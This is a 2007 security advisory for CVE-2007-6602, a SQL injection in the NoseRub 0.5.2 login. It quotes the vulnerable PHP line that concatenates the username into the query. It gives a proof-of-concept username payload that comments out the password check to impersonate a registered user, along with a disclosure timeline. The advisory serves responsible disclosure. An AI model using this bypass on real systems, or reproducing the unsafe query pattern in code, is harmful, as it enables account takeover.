NoseRub 0.5.2 - Login SQL Injection

Related Vulnerabilities: CVE-2007-6602  
Publish Date: 28 Dec 2007

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#         Security Advisory 2007-001                    #

            Advisory: NoseRub Login SQL Injection Vulnerability 
   Affected Versions: <= 0.5.2
      Fixed Versions: current SVN
                Risk: critical
          Vendor URL:
       Vendor Status: informed, fixed version will be released soon
        Advisory URL:
     Advisory Status: public
              Author: Felix Groebert <felix AT groebert DOT org>
            Revision: 2007-12-26

  NoseRub is a protocol for and a sample implementation of a decentralized
  social network.

  The login script fails to validate user input. It is possible to insert
  double quotes in order to escape the following SQL query:

  SELECT `Identity`.`id`, `Identity`.`is_local`, [...]
  FROM `identities` AS `Identity` WHERE `Identity`.`hash` = ''
  AND `Identity`.`username` = ""
  AND `Identity`.`password` = 'f970e2767d0cfe75876ea857f92e319b' LIMIT 1

  The query is generated at the end of the function check() in

  return $this->find(array('Identity.hash' => '',
              'Identity.username = "'. $username .'"', 
              'Identity.password' => md5($data['Identity']['password'])));

Proof of Concept
  The SQL injection bug can be exploited by impersonating a registered user.

     Go to:
  Login as: somereallogin " -- "
  Password: unknownpassword

  This results in the following SQL query, commenting out the fourth and fifth
  lines using double dashes, thus maintaining valid SQL syntax.

  SELECT `Identity`.`id`, `Identity`.`is_local`, [...]
  FROM `identities` AS `Identity` WHERE `Identity`.`hash` = ''
  AND `Identity`.`username` = ""
  -- "" AND `Identity`.`password` = 'f970e2767d0cfe75876ea857f92e319b'

  It is recommended to upgrade to NoseRub > 0.5.2.
  A preliminary patched version of the affected file can be downloaded from
  SVN revision 515:

Disclosure Timeline
  2007-12-19 Problem found
  2007-12-19 Notified developers
  2007-12-20 Received response with proposed fix
  2007-12-20 Sent acknowledgment concerning fix
  2007-12-26 Released advisory to public

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Disclaimer and Copyright
  The author is not responsible for the misuse of the information provided in
  this security advisory. Advisories are a service to the professional
  security community. There are NO WARRANTIES with regard to this information.
  Any application or distribution of this information constitutes acceptance
  AS IS, at the user's own risk. This information is subject to change without

  This advisory Copyright (C) 2007 Felix Groebert. Permission is hereby granted
  to redistribute this advisory, providing that no changes are made and that
  the copyright notices and disclaimers remain intact.


# [2007-12-28]